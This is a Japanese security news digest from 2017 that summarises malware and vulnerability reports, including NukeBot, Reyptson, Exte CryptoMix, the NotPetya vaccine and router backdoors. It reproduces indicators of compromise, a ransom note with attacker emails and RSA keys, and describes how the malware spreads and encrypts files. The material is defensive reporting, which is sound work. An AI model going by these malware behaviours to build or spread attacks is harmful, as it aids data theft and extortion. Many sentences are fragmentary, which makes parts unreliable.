オープンソース ソフトウェア ライブラリの欠陥により、数百万のIoTデバイスにハッキングされる可能性  Bitdefender : blog>IoT News (2017/07/19) 研究者達 は、このソフトウェアのフローがIPカメラに対して悪用できる一つの方法として、遠隔からビデオ画像にアクセスしたり、あるいは、真の所有者がビデオ画像にアクセスすることを拒否することができるようになるだろうと説明している。gSOAP 中に存在している。gSOAPは、インターネットを介してコミュニケートする能力を彼等の製品に提供するためのコード ライブラリを素早く簡単に彼等の製品に組み込みたい開発者によって百万回もダウンロードされているオープンソース ツールキットである。パッチをリリース したが、これは、gSOAPのバグだらけのバージョンを内部に埋め込まれている無数のIoTデバイスをパッチするわけではない。
 - IoTデバイス メーカーは、彼等の製品に或るIoTコードを含める必要がある。そのコードの全てを自分達で記述する代わりに、彼等はサードパーティーのgSOAPライブラリをダウンロードした。
 理想世界に於いては、全てのメーカーは脆弱性をアナウンスし、彼等製品の将来のバージョンに修正されたコードを具現化し、彼等がすでに販売した製品を遠隔からパッチするように振る舞うだろう。
NukeBotバンキング・トロイが現実の脅威に  Kaspersky : SecureList (2017/07/19) 幾つかのハッカーフォーラムでの彼の評価を復活させる ためであったと思われる。以前、彼は自身の開発したものを積極的に奨励し、常軌を逸した態度をとっていたので、結局、彼はスカマー ではないかと疑われた 。ソースコードの公開から3ヶ月経った現在、我々は、このバンキング マルウェアの状況にどのような変化があるのかを検証することにした。
実環境中のNukeBot 
 マルウェアのソースコードの公開は、珍しいことではないかもしれないが、依然としてITコミュニティの注意を惹くものであり、その幾許かの関心は通常、コードの調査を超えるものである。NukeBotのケースも例外ではなかった。我々は、このトロイのコンパイルされた幾つかのサンプルをどうにか手にすることができた。それらの大部分は、興味を惹くものではなかった(ローカルサブネットアドレスのままであったり、あるいはC&Cアドレスとして'localhost/127.0.0.1'のままだった)。大変僅かなサンプルが、「真」のアドレスを持ち、「操作可能」であった。このバンキング・トロイのメインの機能は、ユーザのデータを盗むために特定のページにWebインジェクションを実行することであるが、オペレーショナル・サーバからでさえ、我々は、例のようなソースコード中に含まれる'test'インジェクションを受け取っただけだった。
NukeBotソースコードからのtestインジェクション(画像をクリックすると拡大します)
 我々が手に入れたNukeBotのサンプルは二つの主なタイプに分けることができる。一つはプレーンテキスト文字列のものであり、他の一つは暗号化された文字列のものである。このテストサンプルは一般的にタイプ1に属しているので、我々は、何の問題もなくC&Cアドレスと、このトロイのボディーから解析に要求される他の情報を抽出した。暗号化されたバージョンでは、これは多少複雑であった。暗号キーが最初に抽出される必要があり、その後でなければ、構築されている文字列の値が取得できないためである。当然ながら、上述のことは全て、我々が開発したスクリプトを使用して自動的に実行された。データそれ自体は、実行の冒頭でコールされるこのトロイの唯一のプロシージャ中に集まっていた
プレーンテキストと暗号された文字列の初期化プロシージャの比較(画像をクリックすると拡大します)
 復号(スクリーンショット中のsub_4049F6関数)はキーをXORすることで実行される
Pythonで実装されている復号された文字列
 Webインジェクションのトリガーに関して、我々はC&Cサーバとの対話を模倣する必要があった。C&Cアドレスは初期化プロシージャの文字列から取得できた。
「戦闘グレード」Webインジェクションの例(画像をクリックすると拡大します)
 我々が取得したこのトロイの全サンプルの内、2-5%が「戦闘グレード」である。しかしながら、これらのバージョンが、数人のやる気のあるサイバー犯罪者によって作成されたものなのか、NukeBotの使用が直ぐに衰えるものなのか、あるいは、このソースコードが組織(もしくはグループ)の手に落ち、幾つかの戦闘グレードのサンプルが増えていくのか、定かではない。我々は、この状況を監視することを継続するだろう。
MD5 
626438C88642AFB21D2C3466B30F2312
Reyptson身代金要求型マルウェアは、Thunderbirdのアドレス帳を盗むことであなたの友人にスパムしている  BleepingComputer : News>Security (2017/07/17) 発見した 。それ以来、我々は、この身代金要求型マルウェアの増強された能力を調べてきた。本日、セキュリティ研究者MalwareHunterTeamは詳細に調査し、Reyptsonが、犠牲者の設定したThunderbird eMailアカウントから直接、独自のスパム拡散キャンペーンを実施していることに気がついた 。Reyptson Support & Help Topic を立ち上げた。
Reyptsonは、犠牲者のThunderbirdアドレス帳をスパムすることで拡散している 
 私が記憶している他の身代金要求型マルウェアと異なり、Reyptsonは、犠牲者のコンピュータから実施されるスパムeMailキャンペーンを介して、それ自身を拡散させる能力を持っている。この身代金要求型マルウェアは、Thunderbird eMailクライアントがインストールされているか否かをチェックすることで、これを実行する。そして、Thunderbirdがインスト-すされているのであれば、犠牲者のeMail認証とアドレス帳を読み込もうとする。
Thunderbirdアドレス帳へのアクセス(画像をクリックすると拡大します)
 アドレス帳と認証を取得できたなら、この身代金要求型マルウェアは、犠牲者のアドレス帳にインチキの送り状を送信するスパムキャンペーンを開始する。
スパム拡散(画像をクリックすると拡大します)
 これらのスパムeMailは、Folcan S.L. Facturacion(oは、oにアクセント)の件名を持ち、インチキの送り状を含んでいる。この送り状は、スペイン語で書かれており、送り状をダウンロードするにはリンクをクリックするように受取人に告げている。受取人が、このリンクをクリックすると、factura.pdf.rarと名付けられた、ファイル(実行ファイルを含む)をダウンロードする。この実行ファイルが開かれると、ユーザは、この身代金要求型マルウェアで感染させられることになる。
送信されるeMail(画像をクリックすると拡大します)
Reyptson身代金要求型マルウェアがコンピュータを暗号化している方法 
 犠牲者がReptson身代金要求型マルウェアを実行したのだが、犠牲者はPDF送り状を開いていると思い込んでいる。開いてしまうと、この身代金要求型マルウェアは、リモート コマンド&コントロール サーバ(以下、C2)に接続し、システムのボリュームシリアル番号(【訳注】 Windowsが、1つのディスクを複数の異なるドライブのように使うためのボリュームを識別するために付ける一意の番号(コトバンクより))、犠牲者のログイン名、現在時刻のミリ秒の値で構成される一意のID文字列を送信する。
.doc, .dot, .wbk, .docx, .docm, .dotx, .dotm, .docb, .xls, .xlt, .xlm, .xlsx, .xlsm,
 一致するファイルに遭遇し、孫ファイルが以下のフォルダの一つに存在していなければ、この身代金要求型マルウェアは、AES-128暗号化を使用して暗号化する。
c:\windows, c:\windows.old, c:\users\default, c:\users\all users, c:\users\public,
 ファイルを暗号化している時、この身代金要求型マルウェアは、暗号化したファイルに .Reyptson 拡張子を追加する。例えば、test.pngと名付けられていたファイルは、暗号化されると test.png.Reyptson にリネームされる。
Reyptsonに暗号化されたファイルのフォルダ(画像をクリックすると拡大します)
 ファイルを暗号化している時、この身代金要求型マルウェアまた、暗号化されたファイルの存在する夫々のフォルダにComo_Recuperar_Tus_Ficheros.txtと名付けた脅迫文を作成する。
脅迫文(画像をクリックすると拡大します)
 不当なメッセジを表示するために、この身代金要求型マルウェアはPDFリーダを起動し、インチキのPDFファイルを開く。これは、犠牲者が開いたファイルがPDFであったということを、犠牲者により確信をさせるためである。
Reyptsonロック画面(画像をクリックすると拡大します)
Reyptson支払いサーバ 
 脅迫文もロック画面も、犠牲者が支払い指示を得るためにログインしなければならないTor支払いサーバへのリンクを含んでいる。当初、身代金額は 200ユーロ(25875円)に設定されており、72時間後には 500ユーロ(64680円)に増加する。身代金をBitcoinではなく現実の貨幣で要求することは、犠牲者を混乱させるだけになるので、新人の行為である。
支払いサイト その1(画像をクリックすると拡大します)
支払いサイト その2(画像をクリックすると拡大します)
 犠牲者のログインページの下部に、犠牲者が、この身代金要求型マルウェア開発者とコミュニケーションを採ることを可能にするサポートフォームも存在している。この機能が現在動作するか否かは不明である。Reyptson Support & Help Topic で尋ねることができる。
IOCs 
ハッシュ: 
ネットワーク コミュニケーション 
Reyptson身代金要求型マルウェア関連ファイル 
新たなExte CryptoMix身代金要求型マルウェアの変種がリリースされた  BleepingComputer : News>Security (2017/07/14) Marcelo Rivero は、暗号化したファイル名に .EXTE を追加するCryptoMix身代金要求型マルウェアの新しい変種を発見した。この記事は、この新しい変種に関連する情報の概要を簡潔に提供するものである。この復号プログラムを我々に送って 欲しい、そこで我々は、その復号プログラムを調査することができる。あなた方はまた、我々の専用のCryptomix Help & Support Topic で、CryptoMix身代金要求型マルウェア感染に関する論議やサポートを受けることができる。
Exte CryptoMix身代金要求型マルウェア変種での変更点 
 全体的な暗号化方法は、この変種でも同じであるが、幾つかの相違がある。何よりもまず、_HELP_INSTRUCTION.TXTと名付けられたファイルでの新しい脅迫文がある。この脅迫文は、支払い情報に関してexte1@msgden.net, exte2@protonmail.com, もしくは exte3@reddithub.com の何れかに接触するように指示している。
Exteの脅迫文
 次の際立った変更は、暗号化されたファイルに追加される拡張子である。この変種では、ファイルが暗号化されると、ファイル名が改竄され、暗号化されたファイルには、.EXTE 拡張子が追加される。例えば、この変種によって暗号化されたテスト ファイルは、32A1CD301F2322B032AA8C8625EC0768.EXTEの名前になった。
暗号化されたExteファイルのフォルダ
 興味ある点の一つは、この変種が、以前のAZER種 と同様に、同じ10個の公開RSA鍵の使用を継続していることである。これらの鍵の一つは、犠牲者のファイルを暗号化するために使用されたAES鍵を暗号化するために選択されるだろう。これは、この身代金要求型マルウェアがネットワーク コミニケーションのない完全なオフラインで動作することを可能にしている。
IOCs 
ファイル ハッシュ:  SHA256:
 6211fdd680208f94aa0149619facc0de8b51e6cb98108132d539469f3affa712
Exte CryptoMix変種に関連したファイル名: 
_HELP_INSTRUCTION.TXT
%AppData%\[random].exe
Exte脅迫文: 
Hello!
Attention! All Your data was encrypted!
For specific informartion, please send us an email with Your ID number:
exte1@msgden.net
exte2@protonmail.com
exte3@reddithub.com
We will help You as soon as possible!
DECRYPT-ID-[victim_id] number
Exte身代金要求型マルウェアに関連したeMailアドレス: 
exte1@msgden.net
exte2@protonmail.com
exte3@reddithub.com
同梱されている公開RSA-1024鍵: 
-----BEGIN PUBLIC KEY----- 
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCfBni3t7uANs2aVmoh33h/gUlA
 UMlLAIYgjIQx0cdategi5Gs6SubFxGLoJgjR1TkYXnhB9UxlKCqsAaKSAegQMLRM 7HN/h6eZN7PaLMfFf/
aJgZJe0FuaV/CABEvGopt5VqR3GJLzhgl/qttgsCTQcPFC G4gRBgdJ0Uqdq6Pe1wIDAQAB
-----END PUBLIC KEY-----
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCTp02+iahQUVQQSGTYcAgUdyn8 R6D3+q/
M1GwA4c6ePwXlsEJC8UC4hDE4otjs4Vae0MauQrvkYo2rnilCpiqsv0Oo
 OjDgOHhHI1vUILpWjAVRu61DORWqdvQEH3x9GfGRIulKwhVdzll5sGS9pyGWAAGq XvJ8T/ods5V
+M3nFvQIDAQAB
-----END PUBLIC KEY-----
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC2Zs4/PG+bhEhduEnmB/zS4Ps7
 bD0EDn6q2tgpIwu7WF4NhDwnCQYeX9uweOs+x3pPKIHgZj7KtyOdwjJEMYt4yago
 kMnp24CM413CbGz28tsSLifJpcDq7NdFlItv1foqE3EhxK4RnnsKRnlNnZOmJobj
 BXWAK7kI6PMjAsycjQIDAQAB
-----END PUBLIC KEY-----
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDdcVWIUztGfqsyayX8MJ+MilwA OCMmaedwUkhcrOaZbEr/
kjFAS/51dhxfUmoO2M6N51D1+Tlx1hFP0Bbea41ory14 /jXmBP/
ARTPejT9wmAcdFSYL5RKqn21imymnSfllV7lLSS7fwzIhUibz/c13pk1w UFQpsQKlAmge6nPWMQIDAQAB
-----END PUBLIC KEY-----
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCoXHPF5pGepB37MwkGshTi4N+q
 KaRbRAk6b6tDUxHK8AWyNDJTFKLygvaNTxjAcpY467SDTXQq6EyvaCh2juaSzCLH
 qxcwIVRMH4mtBI8RKx5bycWssbuZD6XwQpcS7WABqE8+BuYDmALgeh1W0UVBQge5
 Alv8dKw5oY2B84RApQIDAQAB
-----END PUBLIC KEY-----
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCfshy8WocDLQBfn36LclXu7obD
 X5hCJFAKntVU3Siyy6XKnumyu/qsiwekxG0QkDrEuWZWGk+/w5qVf+bw1wXbKnBr
 h2FiYqtXgN8pX7h6vDhYNWd80RKg0fxA7sRYoB7HCtel99BCcGOKvWbsr9hcFq3j
 EPtf81OdtqlTI6x6uwIDAQAB
-----END PUBLIC KEY-----
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC3ncKb3ppnuXs7NtizXtdHcKcj
 sfSIhS3E23j5Z4pxYfj3c3ipP8/gxu93/9b6qSQnQ87NRACf8NBbpr1XYR1kGkNK cRk
+u1QsKsVyYP8QoMtnCPbxaIAxZ9qc2o8eFPt44IbOFNo4TS682ZnrgvCIl/D+ taf9I8jbrBTSbfxQ3wIDAQAB
-----END PUBLIC KEY-----
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCNdG6Kp5B6EHKVsENf2QudkLfe
 TMzETNDGBk5cvGpj3On70vZGODVj/WfRe2iHyVE0ykT/iXXtb/C5gw3FePCSGVja
 5S3qH9xh6Ncw5sFrsdgBbm7qPYSbRmux2VTjHlLE44ckkTTCSiTUL3KX/08cU04V hb/
JtNwKF5bg3ycuhQIDAQAB
-----END PUBLIC KEY-----
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCqqapIMkQJgyt8mfVLZRPIEU20 V8c3
+JbWNCdtDrIucv5nsKxJ/hCCDCau8gVjNN5jWtLltoQ0NvwR94HZaUkXAjGq Iy+vvpc66SBLin8pJ/
DzLtA3ouQBrYU2/9C75DrKGuCedEoAzoFkCjz/AokqjTkz xSIkf+5//Rpoj22lHwIDAQAB
-----END PUBLIC KEY-----
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCHZ0EKaGTzyOxqaX2ePqAs46RU
 HhLRsApVWfO0z3BADXv4cv2iGjSXRZE1g7dU/KNEVZrjuBRaHksWpXKIwI6v7vSJ ZcxsaNRZNS
+RTwJbu5VNc5uHBc5YPa7sdqocVrt3b6eXXPbn5gZcQY3L18TTd+S3 DljCC6h8BC80BJI6OQIDAQAB
-----END PUBLIC KEY-----
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCkrR8CoTgor4sIybnVarCSWzMN
 RIoH51qIgCWDx49UQYXXqCn7I4T2XL7iOD5Fb/LO8LLS/BC7xNETIBGwUsOLMUXq
 0LT3wlASZX4l491JPAAzlGfspmWqOnxwFZh4e2kqbix9uTGRw7oC0v7n6pACJSLW
 ybODvrXAfJlITYUYIQIDAQAB
-----END PUBLIC KEY-----
 
Mole02 CryptoMix身代金要求型マルウェア変種用の復号プログラムがリリースされた  BleepingComputer : News>Security (2017/07/05) Secarma  Threat IntelチームのCharley Celice の支援でSTIGroup, Ltd のセキュリティ研究者M AV によって作成された。Mole02/CryptoMix Help and Support Topic で質問しなさい。
Mole復号プログラムを使用して.Mole02 に暗号化されたファイルを復号する方法 
 Mole02 CryptoMix身代金要求型マルウェア種の犠牲者は、暗号化されたファイルが、[変更されたファイル名].MOLE02のフォーマットにリネームされていることで特定される。例えば、暗号化されたファイルは、26E14BA00B70A5D0AE4EBAD33D3416B0.MOLE02 のような名前になっている。暗号化されたファイルのフォルダの例は、以下のようになる。
.Mole02に暗号化されたファイル(クリックすると拡大します)
 この復号プログラムの使い方は大変簡単である。プログラムをダウンロードし、それを実行すると、ファイルを復号するためにドライブのスキャンが始まる。falsepositive を使用して解凍し、このプログラムを実行する。
MOLE02復号プログラム ダウンロード 
 実行すると以下に示す画面が表示される。
.Mole02復号プログラム(クリックすると拡大します)
 このプログラムが実行されている間、このプログラムが何をしているかというような一切の指示は表示されない。このプログラムが終了し、あなたのファイルが復号されるまで(私のテストでは以下)放置しなさい。
復号されたファイルのフォルダ(クリックすると拡大します)
 これでファイルは復号されたので、あなたはコンピュータからこの復号プログラムを削除することができる。この復号プログラムに関して何らかの質問があるのなら、Mole02/CryptoMix Help and Support Topic で遠慮無く質問しなさい。
大流行しているPetya(NotPetya)身代金要求型マルウェアに対するワクチン(キルスイッチではない)が発見された  BleepingComputer : News>Security (2017/06/27) 世界に大災害をもたらしている 。犠牲者は、身代金の支払いを選択した(もはや無意味であり、推奨されない )場合を除いて、彼等のシステムを復元する方法は存在していなかった。
NotPetya身代金要求画面(クリックすると拡大します)
 この攻撃が始まってから数時間のうちは、研究者は、この新しい身代金要求型マルウェアが、古い脅威であるPetyaの新しいバージョンであると確信していたが、その後、この身代金要求型マルウェアが、完全に新種の株であることを発見した。この新たな身代金要求型マルウェアは、Petyaからコードの一部を借りていることが、NotPetya, Petna(我々は、SortaPetyaと呼びたいと思う)と最近呼ばれるようになった理由である。
研究者達は群がってKillswitchメカニズムを発見しようとした 
 この身代金要求型マルウェアの拡散が全世界的であったために、多くの研究者が、暗号化の穴や、WannaCryのような 、拡散を停止させるであろうキルスイッチ(無効化措置)ドメインを発見することを期待して、このマルウェアの解析に群がった。初期の所見 は、PT Security , TrustedSec , Emsisoftのような、他のセキュリティ研究者によって、追認された。
NotPetya/Petna/Petya ワクチンを有効にするには 
 あなたのコンピュータにワクチン接種は、あなたが、NotPetya/Petna/Petyaの現在の株に感染していた場合は不可能である。C:\Windows フォルダ中に perfc と名付けたファイルを作成し、このファイルを読み込み専用に設定しなさい。このタスクを実行する簡単な方法を望む人のために、Lawrence Abramsは、あなたに代わって、このステップを実行するバッチファイルを作成している。このTweetへの返答 に基づき、万全を期して、それらを追加した。https://download.bleepingcomputer.com/bats/nopetyavac.bat  に見出すことができる。コチラのガイド を使用しなさい。フォルダ オプション設定で「登録されていない拡張子は表示しない」がチェックされていないことを確認しなさい。
フォルダ オプション(原文は英語バージョンの画像ですが、Microsoft日本語サイトの画像に変更しています)
 拡張子の表示を有効にしたら(これは常に有効にしておくべきである)、C:\Windows フォルダを開きく。フォルダが開いたら、Notepad.exeプログラムが表示されるまでスクロールダウンする。
Windowsフォルダ
 notepad.exeプログラムを見つけたら、その上を左クリックし、強調表示にする。[Ctrl]+[C]でコピーし、[Ctrl]+[V]で、これをペーストする。ペーストすると、ファイルをコピーするパーミッションの許諾を求めるプロンプトが表示される。
パーミッションの許諾メッセージボックスは、日本語バージョンでは、以下の内容で表示される。
 「続行」ボタンを押すと、このファイルは、notepad-Copy.exeとして作成される。このファイルを左クリックし、次に、キーボードの[F2]キーを押す。これで、notepad-Copy.exeのファイル名の変更ができるようになるので、以下の図に示したように、perfc とタイプする。
ファイル名の変更
 このファイル名を perfc に変更したら、キーボードの[Enter]を押す。あなたは、このファイルの名前を変更したいのか否かを尋ねるプロンプトが表示される。
 「Yes(はい)」ボタンをクリックする。Windowsは再び、このフォルダのファイルの名前を変更するための許可を求めてくる。「継続」ボタンをクリックする。
一番下のProperties(プロパティ)を選択する
 このフォルダのプロパティ メニューが開く。一番下に、「読み取り専用」とラベルされたチェックボックスがある。以下の画像のように、このチェックボックスにチェックをいれる。
読み取り専用属性の指定
 ここで、「適用」ボタンをクリックし、次に「OK」ボタンをクリックする。これで、プロパティウィンドウが閉じる。私のテストでは、私のコンピュータを予防接種するために必要な全てであったが、万全を期すために、同様に、C:\Windows\perfc.dat と C:\Windows\perfc.dll を作成することが提案されている。
Microsftは、Azure AD Connectに関する「重要な」セキュリティアップデートを発行した  Kaspersky : ThreatPost (2017/06/28) 4033453 )は、「重要」と評価される脆弱性としてMicrosoftのTechNet Webサイトに火曜日リリースされた。このアドバイザリは、この脆弱性に対する組織への影響の有無を決定する方法を含んでいる。問題の修正は、最新バージョンのAzure AD Connect(1.1.553.0 )にアップグレードする方法を含んでいる。CVE-2017-8613 が割り当てられている。
MicrosoftはコッソリWindows Defender中のセキュリティホールを塞いでいた  BleepingComputer : News>Security (2017/06/27) 
 金曜日、Microsoftは、Microsoft Malware Protection Engine (MsMpEng、Microsoftエコシステム セキュリティサービスの中核)中の重大なセキュリティフローをパッチする緊急のアップデートをリリースしていた。CVE-2017-8558 として追跡されるこのバグは、このMalware Protection Engineに含まれるx86エミュレータに影響を与えるものであり、Google Project Zeroの研究者Tavis Ormandyによって発見されていた。技術的詳細 によると、この脆弱性は、攻撃者がユーザのコンピュータでコードを実行し、ローカルシステム権限を取得し、犠牲者のPCを制御することを可能にするものである。
悪用はバカバカしいほど簡単 
 このフローを悪用することは、攻撃者が様々な方法(eMail、チャット メッセージ、ファイルのダウンロード、もしくは、犠牲者を欺いて兵器化したJSファイルをホストしている悪意あるWebサイトにアクセスさせる)で不正な形式のファイルを犠牲者に送信することを要求するだけなので、バカバカしいほど簡単である。
PoC(proof-of-concept、概念の実証)は、大変危険なので暗号化される必要があった 
 Ormandyは、Microsoftの従業員のために、このフローをデモするproof-of-conceptファイルを組み立てた。当に、このバグが如何に危険であり、如何に悪用することが簡単なのかを示しているために、Ormandyは、Microsoftに、このPoCデモを送信するにあたり、このPoCがMicrosoftのシステムに到着した瞬間に、MicrosoftのeMailサーバをクラッシュさせる危険があったために、このPoCデモを暗号化した。類似のバグを発見 している。一連の問題 を発見した。
バグは数百万ドルの価値があっただろう 
 これらのバグは全て、攻撃者にセキュリティサービスをクラッシュさせたりバイパスしたりすることが可能であり、ユーザのシステムを乗っ取ることが可能であるために、危険なものである。このようなことを実行できるリリースが、ハッキング フォーラムで売られたなら、地球上の全てのWindowsコンピュータにコッソリ侵入することが可能になるので、悪事の張本人は数百万ドルを手にしていただろう。ツールを構築 していた。彼は、特にWindows Defenderのバグをテストするためにこのツールを組み立てたと発言している。明らかに、このツールは動作し、Microsoft独自のファジングが捕獲できなかった問題を露出させた。
CPUをクラッシュさせるIntelのバグに関して未だWindowsは修正を出していない  BleepingComputer : News>Security (2017/06/27) 発見され 、昨年Intelに通知された。Intelは、2017年の4月と5月にマイクロコード エラッタ(正誤表)の形式で、この問題に関する修正をロールアウトした。Kaby Lake , Skylake , Xeon v5 , Xeon v6 , 一部のPentium と Core Xシリーズ v6 モデルが影響を受けると発言している。セキュリティアドバイザリ で発言している。
新たなGhostHook攻撃は、Windows PatchGuard防御をバイパスする  BleepingComputer : News>Security (2017/06/22) 
GhostHook攻撃は、Intel PT機能を悪用している 
 本日、CyberArkのセキュリティ研究者達は、Intel CPUの機能を使用してPatchGuardを首尾よくバイパスするGhostHookと名付けた新しいテクニックに関する研究を公開した。Intel Processor Trace (デバッグ操作や悪意あるコードの検出を支援する目的で、現在のソフトウェア実行についての情報を捕獲するために専用のハードウェアを使用する)が稼働しているシステムに対してのみ動作する。
MicrosoftはGhostHook攻撃ベクトルをパッチすることはない 
 CyberArkは、GhostHook攻撃についてMicrosoftにコンタクトしたが、セキュリティ アップデートのリリースは拒否されたと発言している。Microsoftは、定例のバグフィックス サイクルで、この問題をパッチするかもしれないが、GhostHookは、セキュリティ フローとして脅威ではないだろうと発言している。コチラ を参照されたい。
McAfeeが、プロキシとしてPCを使用するPinkslipbot残存物を削除する無料ツールをリリースした  BleepingComputer : News>Security : News (2017/06/20) 
Pinkslipbotは広く知られた深刻な脅威である 
 Pinkslipbotは、マルウェアの状況に於いて、主に特定のターゲットを定めていることで広く知られた脅威である。この著者は、レギュラーユーザを追い求めていないが、歴史的に北米企業、とりわけ、コーポレートバンキング、金融機関、トレジャリーサービス等のような儲かる産業をターゲットにしていた。1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 ]を潰してきた。Active Directory(【訳注】 マイクロソフトによって開発されたディレクトリ・サービス・システムであり、Windows 2000 Serverから導入された、ユーザとコンピュータリソースを管理するコンポーネント群の総称(Wikipediaより))をロックアウトする Pinkslipbotの亜種に気がついたIBMのセキュリティ研究者によって発見された。
McAfeeはPinkslipbot感染中に新しい欠点を発見した 
 歴史的にPinkslipbotキャンペーンを追跡してきた企業の一つがMcAfeeである。この研究者達は、昨年のVirus Bulletinセキュリティ カンファレンスで、このトロイのC&Cサーバの基盤構造の解析と、そのC&Cコミュニケーションの方法をを提示した。発見した 。
新しいMcAfeeのツールは、Pinkslipbot感染の最終的な残存物を削除する 
 McAfeeによると、殆どのセキュリティツールは、このマルウェアのメインのバイナリだけを削除する。これで、感染したホストからパスワードを収集するための、このトロイの能力は活動不能になる。コチラ (PDF )に使用説明書を公開している。
韓国の企業が身代金支払いの最高額を更新  The BBC : News (2017/06/20) 
支払不能者 
 Erebusとして知られるこの身代金要求型マルウェアは、Microsoft Windowsを実行しているコンピュータをターゲットにしているが、変種はLinuxベースのシステムでも動作するように修正されている。
KasperskyがJaff身代金要求型マルウェア用復号プログラムをリリース  BleepingComputer : News>Security (2017/06/14) 専用のJaff Ransomware Help & Support Topic に遠慮無く投稿しなさい。
RakhniDecryptorを使用してJaff (SVN, WLU, Jaff)で暗号化されたファイルを復号する方法 
 Jaff身代金要求型マルウェアに感染した犠牲者は、彼等の暗号化されたファイルに .jaff, .wlu, .sVn 拡張子の何れかが追加されていることで同定される。例えば、test.jpgと名付けられていたファイルが暗号化されると、test.jpg.jaff, test.jpg.wlu, test.jpg.sVn の何れかにリネームされているだろう。Jaffの .sVn変種によって暗号化されたファイルのフォルダの例を以下に掲げる。
Jaffで暗号化されたファイル(画像をクリックすると拡大します)
 Jaffで暗号化されたファイルを復号する前に、この身代金要求型マルウェアを終了させる必要がある。これを実行するには、Windowsセキュリティ画面を開くために[Ctrl]+[Alt]+[Delete]キーコンビネーションを実行することによって、Windowsタスクマネージャを選択し、開く。
タスクマネージャ
 これで、Jaffはコンピュータ上で実行されていないので、我々は、暗号化されたファイルの復号を始めることができる。まず、RakhniDecryptorをダウンロード し、このプログラムを解凍する。次に、それを実行する。この復号プログラムが起動すると、以下に示すメイン・スクリーンが表示される。
RakhniDecryptor
 始める前に、あなたが、バージョン 1.21.2.1(このバージョンがJaff身代金要求型マルウェアをサポートしている)を使用していることを確認する必要がある。RakhniDecryptorのバージョンをチェックするには、上図の左下隅にあるAboutをクリックしなさい。これで、RakhniDecryptorのバージョンを示す小さなウィンドウが表示される。
About画面
 バージョン 1.21.2.1 もしくは、それ以降を使用しているのであれば、Start Scanボタンをクリックしなさい。RakhniDecryptorは、あなたに暗号化されたファイルを選択するように促してくる。Jaffで暗号化されたファイルを含むフォルダに移動し、.Word, Excel, PDF, ミュージック, 画像 ファイルの何れかを選択しなさい。
Jaffで暗号化されたファイルを選択する(画像をクリックすると拡大します)
 暗号化されたファイルを選択すると、RakhniDecryptorは、同様に脅迫文を選択するよう要請してくる。
Jaffの脅迫文を選択する(画像をクリックすると拡大します)
 脅迫文を選択したら、Openボタンをクリックする。RakhniDecryptorは、これで暗号化されたファイルに関してコンピュータ全体をスキャンし、それらを復号するだろう。
Jaffで暗号化されたファイルをスキャン中
 このプロセスは大変長い時間がかかるので、この復号プログラムがコンピュータをスキャンし、暗号化されたファイルを復号する間、辛抱しなさい。
復号完了
 この復号プログラムによって復号されたJaffファイルの完全なリストを見るには、detailsのリンク(【訳注】 上の画像中のScan Completedの2行下、Processed: の右端)をクリックしなさい。
スキャン結果のページ(画像をクリックすると拡大します)
 あなたのファイルは現在復号されているけれども、暗号化されたオリジナルのファイルは残されたままであることに留意する必要がある。
復号されたフォルダのファイル(画像をクリックすると拡大します)
 あなたのファイルは、これで復号されたが、暗号化されたオリジナルのファイルはコンピュータ上に残ったままになっている。ファイルが適切に復号されたことを確認したら、暗号化されている全てのファイルを或る特定のフォルダに移動させるために
CryptoSearch を使用しなさい。これで、暗号化されているオリジナルのファイルを削除したり、アーカイブしたりすることができる。
 これで、ファイルは復号されたので、RahkniDecryptorを終了しなさい。
研究者が、Windows Defenderエンジンの修正は不完全と発言  The Register : Security (2017/06/15) 
Youtubeのビデオ 1
Youtube ビデオ 
Youtubeのビデオ 2
Youtube ビデオ 
 最初のビデオで見られたように、システムを完全にパッチしているにも拘わらず、Leeの作業はWindows Defenderをクラッシュし、再起動が不可能なことを示している。Ormandyの別のTweet にも一致している。この脆弱性 (未だ確定していないと、Vanhoutteは記述している)は、ゲスト権限の攻撃者にDefenderを使用する能力を与え、Dllを含む任意のファイルを削除できるようにするものである(これは、様々なハイジャックの機会を提供することになるだろう)。
一部の古いWiMAXルータは、OEMバックドアを含んでいる  BleepingComputer : News>Security (2017/06/07) WiMAX テクノロジを基礎とする一部の古いルータは、そのデバイスの供給プロセスの何処かで導入されたと思われるバックドア アカウントを含んでいる。
攻撃者は管理アカウントのパスワードを変更することができる 
 彼等が発見した脆弱性は、CVE-2017-3216 であり、これは、Webベース管理パネルの認証をバイパスするものである。研究者達によると、攻撃者は、これらのルータと共に出荷された組み込みのWebサーバ上のファイルにアクセスすることができ、メインの管理アカウントのパスワードを変更することができる。
GreenPacket OX350 (Version: ?)
 
 * 他のルータも影響を受ける可能性が高い。
不可解なOEMバックドアのケース 
 SEC Consultの研究者達は、彼等がオペレーションを検査している間、彼等が使用したツールは、一部のルータのファームウェア中にハードコードされていた大量のUNIXスタイルのパスワード ハッシュを見つけ出した。これらのタイプのハッシュは、デバイスにバックドア アカウントが付属している場合にだけ現れる。
 バックドア アカウント用のパスワードハッシュ(画像をクリックすると拡大します)
 コードを詳細に調べた後、彼等は、認証バイパス脆弱性とバックドア アカウントの両方が、台湾のハードウェア企業MediaTek(【訳注】 メディアテック)によって開発されたSDKを介して導入されていたことを明確にした。
数万のルータがオンラインで利用可能になっている 
 影響を受ける殆どのルータは、かなり昔(2010年頃に製造された)のものである。Huawei(ファーウェイ)は、影響を受けるモデルの全てに関して2014年頃にサポートを停止したと発言している。
WannaCry後、Fireballマルウェアが2億5000万のコンピュータに感染している。インドが最悪の影響を受けた  Fossbytes : News (2017/06/07) 
